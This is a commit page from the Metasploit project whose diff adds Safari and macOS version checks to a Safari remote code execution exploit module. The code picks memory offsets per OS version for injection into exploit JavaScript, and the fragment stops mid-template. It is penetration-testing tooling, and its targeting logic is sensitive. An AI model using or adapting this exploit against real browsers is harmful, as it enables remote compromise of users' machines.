Land #11347, add version check to Safari RCE exploit

4.x
Brent Cook 2019-02-04 05:22:01 -06:00 committed by Metasploit
parent b016447ea6
commit 99cc417a5c
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 12 additions and 4 deletions

View File

@ -98,14 +98,22 @@ class MetasploitModule < Msf::Exploit::Remote
def get_offsets(user_agent)
if user_agent =~ /Intel Mac OS X (.*?)\)/
version = $1.gsub("_", ".")
mac_osx_version = Gem::Version.new(version)
osx_version = $1.gsub("_", ".")
if user_agent =~ /Version\/(.*?) /
if Gem::Version.new($1) >= Gem::Version.new('11.1.1')
print_warning "Safari version #{$1} is not vulnerable"
return false
else
print_good "Safari version #{$1} appears to be vulnerable"
end
end
mac_osx_version = Gem::Version.new(osx_version)
if mac_osx_version >= Gem::Version.new('10.13.4')
print_warning "macOS version #{mac_osx_version} is not vulnerable"
elsif mac_osx_version < Gem::Version.new('10.12')
print_warning "macOS version #{mac_osx_version} is not vulnerable"
elsif offset_table.key?(version)
offset = offset_table[version]
elsif offset_table.key?(osx_version)
offset = offset_table[osx_version]
return <<-EOF
const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};